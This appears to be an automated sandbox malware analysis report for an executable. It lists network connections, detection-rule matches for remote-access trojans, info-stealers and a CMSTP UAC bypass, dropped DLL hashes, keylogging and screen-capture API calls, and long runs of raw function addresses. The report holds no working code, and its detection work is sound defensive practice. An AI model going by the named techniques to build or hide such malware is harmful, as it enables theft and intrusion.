Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 169.150.236.100:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.236.100:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe

Code function: 2_2_00DAC8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

2_2_00DAC8B0

Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe

Code function: 2_2_6C7BA5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

2_2_6C7BA5AA

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 13.2.run.exe.37b586d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.56c5264.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 3.2.cmd.exe.56c5e64.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.57f9264.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.450d86d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.57f9e64.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 2.2.run.exe.4551d5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.run.exe.37f9d5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.57b5976.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 13.2.run.exe.37f915b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.5681976.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 2.2.run.exe.455115b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.2500065620.0000000004354000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1986065052.0000000004255000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Code function: 1_2_6BCC62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

1_2_6BCC62C0

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_00427880	0_2_00427880
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0040B8AE	0_2_0040B8AE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0040C191	0_2_0040C191
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0040C44C	0_2_0040C44C
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0042140C	0_2_0042140C
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0040BC20	0_2_0040BC20
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0041BE39	0_2_0041BE39
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0040BECA	0_2_0040BECA
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0041B722	0_2_0041B722
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0040C7FC	0_2_0040C7FC
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BEC6B3	0_2_05BEC6B3
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BEF6A8	0_2_05BEF6A8
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BEBE87	0_2_05BEBE87
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BF2607	0_2_05BF2607
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BFB989	0_2_05BFB989
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BE89C8	0_2_05BE89C8
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BEC131	0_2_05BEC131
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BEC3F8	0_2_05BEC3F8
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BEBB15	0_2_05BEBB15
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BECA63	0_2_05BECA63
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBE0BA0	1_2_6BBE0BA0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC46BE0	1_2_6BC46BE0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBBEA80	1_2_6BBBEA80
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBF8A30	1_2_6BBF8A30
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBEEA00	1_2_6BBEEA00
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBBCA70	1_2_6BBBCA70
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBD09A0	1_2_6BBD09A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBFA9A0	1_2_6BBFA9A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC5C9E0	1_2_6BC5C9E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB749F0	1_2_6BB749F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC009B0	1_2_6BC009B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB96900	1_2_6BB96900
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB78960	1_2_6BB78960
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC468E0	1_2_6BC468E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC14840	1_2_6BC14840
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB90820	1_2_6BB90820
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBCA820	1_2_6BBCA820
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB4EFB0	1_2_6BB4EFB0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC1EFF0	1_2_6BC1EFF0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB40FE0	1_2_6BB40FE0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC88FB0	1_2_6BC88FB0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB46F10	1_2_6BB46F10
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC02F70	1_2_6BC02F70
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC80F20	1_2_6BC80F20
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBAEF40	1_2_6BBAEF40
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBC6E90	1_2_6BBC6E90
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB4AEC0	1_2_6BB4AEC0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBE0EC0	1_2_6BBE0EC0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBDEE70	1_2_6BBDEE70
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC20E20	1_2_6BC20E20
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB44DB0	1_2_6BB44DB0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BCCCDC0	1_2_6BCCCDC0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBD6D90	1_2_6BBD6D90
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC6AD50	1_2_6BC6AD50
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC0ED70	1_2_6BC0ED70
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BCC8D20	1_2_6BCC8D20
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB9ECD0	1_2_6BB9ECD0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB3ECC0	1_2_6BB3ECC0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC06C00	1_2_6BC06C00
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB4AC60	1_2_6BB4AC60
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC1AC30	1_2_6BC1AC30
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB9E3B0	1_2_6BB9E3B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB723A0	1_2_6BB723A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB943E0	1_2_6BB943E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBB2320	1_2_6BBB2320
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC5C360	1_2_6BC5C360
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC82370	1_2_6BC82370
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB42370	1_2_6BB42370
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBD6370	1_2_6BBD6370
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB48340	1_2_6BB48340
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BCC62C0	1_2_6BCC62C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC122A0	1_2_6BC122A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC0E2B0	1_2_6BC0E2B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC0A210	1_2_6BC0A210
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBC8260	1_2_6BBC8260
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC18220	1_2_6BC18220
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBD8250	1_2_6BBD8250
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB401E0	1_2_6BB401E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBB6130	1_2_6BBB6130
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC24130	1_2_6BC24130
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBA8140	1_2_6BBA8140
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB500B0	1_2_6BB500B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB38090	1_2_6BB38090
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC1C0B0	1_2_6BC1C0B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC0C000	1_2_6BC0C000
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB8E070	1_2_6BB8E070
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC08010	1_2_6BC08010
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB6A7D0	1_2_6BB6A7D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBC0700	1_2_6BBC0700
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB9E6E0	1_2_6BB9E6E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBDE6E0	1_2_6BBDE6E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB646D0	1_2_6BB646D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB9C650	1_2_6BB9C650
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB345B0	1_2_6BB345B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC0A5E0	1_2_6BC0A5E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBCE5F0	1_2_6BBCE5F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC44540	1_2_6BC44540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC88550	1_2_6BC88550
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBE0570	1_2_6BBE0570
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBA2560	1_2_6BBA2560
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB98540	1_2_6BB98540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC6A480	1_2_6BC6A480
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB864D0	1_2_6BB864D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBDA4D0	1_2_6BBDA4D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBCA430	1_2_6BBCA430
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBA4420	1_2_6BBA4420
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB58460	1_2_6BB58460
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB99BA0	1_2_6BB99BA0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB31B80	1_2_6BB31B80
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB87BF0	1_2_6BB87BF0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC25B90	1_2_6BC25B90
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC09BB0	1_2_6BC09BB0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DAF840	2_2_00DAF840
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00D94060	2_2_00D94060
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DAB150	2_2_00DAB150
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DB6130	2_2_00DB6130
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00F1091C	2_2_00F1091C
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00D92120	2_2_00D92120
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DDCAA0	2_2_00DDCAA0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DE9A00	2_2_00DE9A00
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DA4390	2_2_00DA4390
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DB0390	2_2_00DB0390
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DBFC10	2_2_00DBFC10
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DE5550	2_2_00DE5550
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00D9D570	2_2_00D9D570
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00D9A6F0	2_2_00D9A6F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DB66F0	2_2_00DB66F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DE96E0	2_2_00DE96E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00D937B0	2_2_00D937B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C894D8F	2_2_6C894D8F
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C893D16	2_2_6C893D16
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C8A371C	2_2_6C8A371C
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C80D24D	2_2_6C80D24D

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: String function: 6BCCDAE0 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: String function: 6BCCD930 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: String function: 6BB63620 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: String function: 6BB69B10 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: String function: 6BCC09D0 appears 229 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: String function: 00D91310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: String function: 00F19D36 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: String function: 00D914F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: String function: 00D91900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: String function: 6C896320 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: String function: 00D91930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: String function: 6C894701 appears 60 times
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: String function: 05BE9F27 appears 48 times
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: String function: 05C07A73 appears 43 times
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: String function: 0042780C appears 43 times

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 944

Source: kO1P1YnLst.exe, 00000000.00000003.1792381093.0000000005E73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1986096149.00000000042F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790523128.0000000005E5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1985855543.0000000004048000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790377394.0000000005E45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1794062629.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790570193.0000000005E63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1986651920.0000000005E64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1986651920.0000000005E64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1792292879.0000000005E4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1792420578.0000000005E58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795345147.0000000005E64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1986431340.0000000005DEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789195870.0000000005E45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789248746.0000000005E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795228001.0000000005E63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795010430.0000000005E45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795188664.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1792445000.0000000005E63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789371537.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1794624698.0000000005E45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs kO1P1YnLst.exe
